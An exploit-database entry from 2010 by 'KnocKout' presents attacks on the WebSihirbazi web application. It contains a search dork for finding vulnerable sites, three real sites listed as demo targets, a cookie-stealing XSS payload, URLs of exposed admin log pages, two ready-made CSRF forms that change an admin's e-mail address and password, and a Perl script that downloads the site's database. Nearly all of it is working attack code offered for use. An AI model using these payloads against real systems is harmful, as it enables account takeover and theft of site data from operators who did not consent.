WebSihirbazi <= Multiple Remote Vulnerabilities

2010-10-13T00:00:00
ID 1337DAY-ID-14416
Type zdt
Reporter KnocKout
Modified 2010-10-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===============================================
WebSihirbazi <= Multiple Remote Vulnerabilities
===============================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm KnocKout  member from Inj3ct0r Team           1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~] Contact : [email protected]
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : WEB Sihirbaz
~Version : unspecified
~Software: http://www.sitehazirla.org/
~Vulnerability Style : Disclosure
~DORK : Powered By WebSihirbaz
~Vuln.Date of birth:) : 11.10.2010
-----------
Demos
http://www.kazem.com.tr
http://www.cevrikcaglar.com
http://www.efecelikboru.com.tr
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
               ------- Explotation ------
               Cross Site Scripting 
              http://VICTIM/admin/Default.asp?GirisMSJ="><script>alert(document.cookie)
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
              Unquestionably LOGS 
              http://VICTIM/admin/stats/gelip.asp
              http://VICTIM/admin/stats/saysite.asp
              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
              
   ------- CSRF Exploits -------
  E-mail Change CSRF Exploit(HTML);
####################################################################################
   ------- E-mail Change CSRF Exploit(HTML) -------
######################################################################################

<title>E-mail Change CSRF Exploit by KnocKout</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0"><DIV align=center>
<TABLE style="BORDER-COLLAPSE: collapse" borderColor=#ffffff cellPadding=5 width=427 border=1>
<TBODY>
<TR>
<TD width=417>
<FORM name=form action=http://[VICTIM]/admin/EpostaDegistirgonder.asp method=post>
<TABLE height=114 cellSpacing=3 cellPadding=2 width=411 align=center border=0>
<TBODY>

<TR>
<TD borderColor=#ffffff align=right width=162 bgColor=#ffffff height=9><SPAN style="FONT-WEIGHT: 700"><FONT style="FONT-SIZE: 8pt" face=Verdana>Eski Adresiniz</FONT></SPAN><FONT style="FONT-WEIGHT: 700; FONT-SIZE: 8pt" face=Verdana> :</FONT></TD>
<TD width=232 bgColor=#ffffff height=9><FONT face=Verdana><INPUT id=isim1 style="FONT-SIZE: 8pt; COLOR: #000000; FONT-FAMILY: Verdana" size=28 [email protected] name=adres></FONT></TD></TR>
<TR>
<TD borderColor=#ffffff align=right width=162 bgColor=#ffffff height=29><SPAN style="FONT-WEIGHT: 700"><FONT style="FONT-SIZE: 8pt" face=Verdana>Yeni Adresiniz</FONT></SPAN><FONT style="FONT-WEIGHT: 700; FONT-SIZE: 8pt" face=Verdana> :</FONT></TD>
<TD width=232 bgColor=#ffffff height=29><FONT face=Verdana><INPUT id=isim4 style="FONT-SIZE: 8pt; COLOR: #000000; FONT-FAMILY: Verdana" size=28 [email protected] name=email></FONT></TD></TR>
<TR>
<TD align=right width=162 bgColor=#ffffff height=10><FONT style="FONT-WEIGHT: 700; FONT-SIZE: 8pt" face=Verdana>New Password :</FONT></TD>
<TD width=232 bgColor=#ffffff height=10><INPUT id=isim2 style="FONT-SIZE: 8pt; COLOR: #000000; FONT-FAMILY: Verdana" type=password size=28 name=sifre></TD></TR>
<TR>

<TD align=right width=162 bgColor=#ffffff height=23><FONT style="FONT-WEIGHT: 700; FONT-SIZE: 8pt" face=Verdana>Re New Password :</FONT></TD>
<TD width=232 bgColor=#ffffff height=23><INPUT id=isim3 style="FONT-SIZE: 8pt; COLOR: #000000; FONT-FAMILY: Verdana" type=password size=28 name=sifre2></TD></TR>
<TR>
<TD width=162 bgColor=#ffffff height=30><INPUT id=Subject type=hidden value="Exploit Exec!" name=Subject></TD>
<TD width=232 bgColor=#ffffff height=30><INPUT type=submit value=Degisitir name=Submit>&nbps; </TD></TR></TBODY></TABLE></FORM></TD></TR></TBODY></TABLE></DIV></body>
</html>

####################################################################################
   ------- E-mail add CSRF Exploit(HTML) -------
######################################################################################
  <title>E-Mail Add CSRF Exploit by KnocKout</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
</head>

<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0">
<div align="center">
  <table width="427" border="1" cellpadding="5" bordercolor="#FFFFFF" style="border-collapse: collapse">
    <tr>

      <td width="417"><form name="form" method="post" action="http://[VICTIM]/admin/EpostaEklegonder.asp">
          <table width="411" border="0" align="center" cellpadding="2" cellspacing="3" height="114">
            <tr> 
              <td width="162" align="right" height="23" bordercolor="#FFFFFF" bgcolor="#FFFFFF">
              <span style="font-weight: 700">
              <font face="Verdana" style="font-size: 8pt">E.posta Adresiniz</font></span><font face="Verdana" style="font-size: 8pt; font-weight:700"> :</font></td>
              <td width="232" height="23" bgcolor="#FFFFFF"><font face="Verdana">
              <input name="email" type="text" id="isim1" size="28" style="font-family: Verdana; font-size: 8pt; color: #000000" value="@VICTIM"></font></td>

            </tr>
            <tr> 
              <td align="right" width="162" height="10" bgcolor="#FFFFFF">
              <font face="Verdana" style="font-size: 8pt; font-weight:700">
              Юifreniz :</font></td>
              <td width="232" height="10" bgcolor="#FFFFFF">
              <input name="sifre" type="password" id="isim2" size="28" style="font-family: Verdana; font-size: 8pt; color: #000000"></td>
            </tr>
            <tr>

              <td align="right" width="162" height="23" bgcolor="#FFFFFF">
              <font face="Verdana" style="font-size: 8pt; font-weight:700">
              Юifre Tekrarэ :</font></td>
              <td width="232" height="23" bgcolor="#FFFFFF">
              <input name="sifre2" type="password" id="isim3" size="28" style="font-family: Verdana; font-size: 8pt; color: #000000"></td>
            </tr>
            <tr>
              <td width="162" height="30" bgcolor="#FFFFFF"><input name="Subject" type="hidden" id="Subject" value="Exploit Exec!"></td>

              <td width="232" height="30" bgcolor="#FFFFFF">
              <input type="submit" name="Submit" value="Ekle">&nbps; </td>
            </tr>
            </table>
        </form></td>
    </tr>
  </table>
</div>
</body>

</html>

----------------------------------------
WebSihirbazi <= Remote Database Disclosure Exploit

    ~~~~~~~~ Explotation|(pl)~~~~~~~~~~~
    
use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('title WEB Sihirbaz - Remote Disclosure Exploit');
system('color 4');


if(@ARGV < 2)
{
print "[-]Ornegi inceleyin\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}

print "\n************************************************************************\n";
print "\* WEB Sihirbaz - Remote Disclosure Exploit              *\n";
print "\* Exploited By : KnocKout                                                  *\n";
print "\* Contact :   knockoutr[at]msn[dot]com                                 *\n";
print "\* --                                    *\n";
print "\*********************************************************************\n\n\n";

($TargetIP, $path, $File,) = @ARGV;

$File="_os_data/OS_data.mdb";
my $url = "http://" . $TargetIP . $path . $File;
print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/db.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/db.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}


    ================================



#  0day.today [2018-02-18]  #